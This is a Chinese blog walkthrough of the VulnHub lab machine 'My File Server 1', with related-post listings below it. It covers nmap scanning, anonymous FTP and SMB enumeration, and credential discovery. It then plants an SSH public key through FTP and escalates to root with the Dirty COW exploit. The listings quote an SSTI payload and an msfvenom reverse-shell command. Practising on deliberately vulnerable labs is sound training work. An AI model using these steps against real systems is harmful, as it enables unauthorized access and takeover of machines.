vulnhub靶机My_file_server_1

最新推荐文章于 2023-12-25 20:07:44 发布
最新推荐文章于 2023-12-25 20:07:44 发布
阅读量280 收藏 2
点赞数
分类专栏: web 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54515836/article/details/113953837
版权

My_file_server_1

My_file_server_1

攻击机:192.168.87.134
靶机:192.168.87.139

信息搜集

用nmap先进行主机发现,使用命令

nmap -A -T4 -v 192.168.87.0/24

开启的端口:21 22 80 111 445 2049 2121
开放了http,ftp,smb,ssh服务

访问80端口,没有发现啥有价值的,然后使用御剑,扫到了一个readme.txt在这里插入图片描述一个密码,但是不知道是哪个服务的密码。
开启了21端口,匿名访问一下(账号:anonymous 密码:guest)
在这里插入图片描述

然后有下面一些文件

在这里插入图片描述然后又看smb服务有什么发现没,先用smbmap枚举目录,然后发现smbdata有读和写的权限

在这里插入图片描述

登录smbdata

smbclient //192.168.40.158/smbdata

在这里插入图片描述用get将secure文件下载下来,可以得到账号

get secure

在这里插入图片描述
尝试使用账号密码登录ssh,但需要密钥才能登录,暂时先放一边,

ssh免密操作

现在已经有了用户名smbuser,而且一开始网页给了密码rootroot1。那么再尝试一下用ftp登录(不知道为啥密码不能用chauthtok)登录成功

在这里插入图片描述可以伪造一对ssh的密钥,把公钥放到靶机上就可以实现免密登入

ssh-keygen -t rsa

在这里插入图片描述
通过ftp将密钥传到靶机

mkdir ~/.ssh
put /root/.ssh/id_rsa.pub ~/.ssh/authorized_keys

然后ssh登录,登录成功
在这里插入图片描述

脏牛提权

然后准备提权,先查看版本内核

uname -a

发现可以使用脏牛提权
影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。
在攻击机上使用msf在这里插入图片描述将得到的脏牛用ftp传到靶机
put /root/40616.c /tmp/dirty.c
在这里插入图片描述
用gcc编译,然后执行脏牛,成功获取root权限

gcc -ptheard dirty.c -o dirty -lcrypt
./dirty 123456
HoAd's blog
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
vulnhub靶机-My File Sever
臭nana的博客
05-10 722
1、在virtualbox上部署靶机,在kali上使用下面的主机发现靶机ip是192.168 netdiscover -r 192.168.0.0/24 2、使用nmap命令扫描端口服务 nmap -p- -A 192.168.0.116 3、发现80端口,打开网站,查看源码,没发现什么有用的信息,扫描目录,看到readme.txt,访问得到一个不知道用户名的密码 4、还有两个ftp服务,先匿名连接21端口试试 查看一下有些什么文件 想尝试下载一些可疑文件下来看
Vulnhub靶机渗透:MY FILE SERVER: 1
Mysmycbx的博客
06-11 1573
靶机链接: https://www.vulnhub.com/entry/my-file-server-1,432/ 处理信息,获取开放端口 服务扫描 漏洞扫描 选择渗透方向 观察服务,发现 通过查看,这里比较感兴趣的是secure文件,但是目前没有权限,检查一下2121端口 和21端口一样没有信息。那就下一个。 通过阅读secure文件,发现了以下信息。 写入 这里尝试一下密码碰撞,登录21端口ftp,失败。 2121端口,ftp失败,22端口欧ssh,失败。 通过阅读额sshd_confi
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2
Aluxian_的博客
04-11 1443
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机难度适中2.smb共享smbmap枚举(工具得使用)ssh私钥登入3.文件复制漏洞利用希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
MY FILE SERVER: 1
最新发布
zzf011900的博客
12-25 528
现在已经有了用户名smbuser,而且一开始网页给了密码rootroot1。那么再尝试一下用ftp登录(不知道为啥密码不能用chauthtok)登录成功。重新连接ftp,创建.ssh文件夹,上传文件,退出,ssh -i登录。下载完退出smb(exit),然后cat查看这两个文件发现发现用户smbuser,密码chauthtok。进行ssh免密操作,然后上传到靶机 在进行ssh登入 登入成功。但是不知道密码是哪个服务的 尝试一下ftp匿名登陆。这里发现内核版本较低,可以尝试使用脏牛提权。
靶机vulnhub靶机my_file_server2
weixin_52450702的博客
01-31 507
靶机vulnhub靶机my_file_server2
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
靶机Moonraker_1练习报告1
08-08
靶机Moonraker_1练习报告1
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
vulnhub靶机-My File Sever2
臭nana的博客
05-12 567
前面几步和我之前写的My File Server一样 1、发现靶机ip---192.168.0.118 2、使用nmap扫描 3、访问80端口得到的信息是一样的----一个不知道用户名的密码rootroot1 4、匿名连接21端口,访问结果和前面是一样的,依然没有权限下载 5、匿名连接2121端口,结果一样 6、连接smb服务,这个是有权限的,和之前一样,发现了smbuser用户 7、还是一样的试试是不是要使用秘钥登录,发现果然是的,那么接下来的任务就是需要把id_rs
vulnhub学习-My File Server: 1
qq_43332837的博客
04-25 160
打开靶机 neidiscover进行主机发现 nmap nikto进行扫描 发现readme.txt 访问一下 得到密码但不知到是哪个服务的 试下ftp匿名登陆 发现下面有一些文件,用smbmap枚举目录 发现smbdata有读和写的权限 登陆smbdata,把sshd_config和secure get下来 在source下找到用户名和密码再用用户名和一开始的密码登陆ftp 尝试登陆ssh因为有密钥所以先伪造密钥 再通过ftp将伪造的密钥上传 成功登陆ssh unmae -a查看版本内核 使用脏牛提权
【My File Server】靶场记录
weixin_46411728的博客
02-19 181
【My File Server】靶场记录
靶机渗透-Vulnhub-My File Server1
dahege666的博客
09-07 462
攻击机:192.168.239.131 靶机:192.168.239.140 1、使用nmap扫描目标主机,查看开启端口服务 2、访问80端口,查看首页和源码没有发现有用的信息 3、目录扫描找到一个readme.txt,包含一个密码 4、扫描扫描中还有包括了两个ftp服务,先连接21端口,查看文件,有的文件不能下载,权限不够,2121端口连接不上。 5、尝试连接smb服务,使用smbclient -L 192.168.239.140 进行匿名登陆,提示输入密码时直
vulnhub靶机---MY FILE SERVER: 1
Luciano12的博客
10-09 370
一、信息搜集 1.主机发现 netdiscover -i eth0 -r 192.168.1.0/24 2.使用nmap,nikto扫描端口信息 有21,22,80,445端口,打开网站,没有可利用的东西,使用了dirmap扫描目录,发现了readme.txt,上面nikto也扫描到了 二、漏洞利用 1.匿名登陆连接ftp,查找文件,没有发现可利用的文件,ssh登录拒绝 2.尝试连接smb服务,发现了共享文件夹 三个文件夹内只能匿名访问smbdata,查看里面的文件 在secure中发现账
Dockerfile-server2
weixin_30484247的博客
03-05 67
[root@lab2 docker-file]# cd server2/ [root@lab2 server2]# ls ddbes-server2-0.0.1-SNAPSHOT.jar Dockerfile [root@lab2 server2]# cat Dockerfile FROM java:8-jre-alpine COPY ddbes-server2-0...
靶机渗透------DC-3
Z_Grant的博客
09-19 5570
文章目录一,工具学习二,测试流程(1)信息收集 一,工具学习 二,测试流程 (1)信息收集
ssti详解与例题以及绕过payload大全
HoAd'blog
02-10 9054
ssti详解与例题以及绕过payload大全 [BJDCTF2020]Cookie is so stable user=1231{{2*4}} 判断是不是ssti user={{system('ls')}} 执行命令,但不能成功,,好像是空格不可以 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 这是最后的payload https://0day.work/jinja2
msf的reverse_tcp和bind_tcp两者的区别
HoAd'blog
07-31 5339
msf的reverse_tcp和bind_tcp两者的区别reverse_tcpbind_tcpreverse_httpreverse_https安全性 reverse_tcp 攻击机设置一个端口(LPORT)和IP(LHOST),Payload在测试机执行连接攻击机IP的端口,这时如果在攻击机监听该端口会发现测试机已经连接。 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=0.0.0.0 lport=4444 -f elf -o shell bi
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

HoAd's blog

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值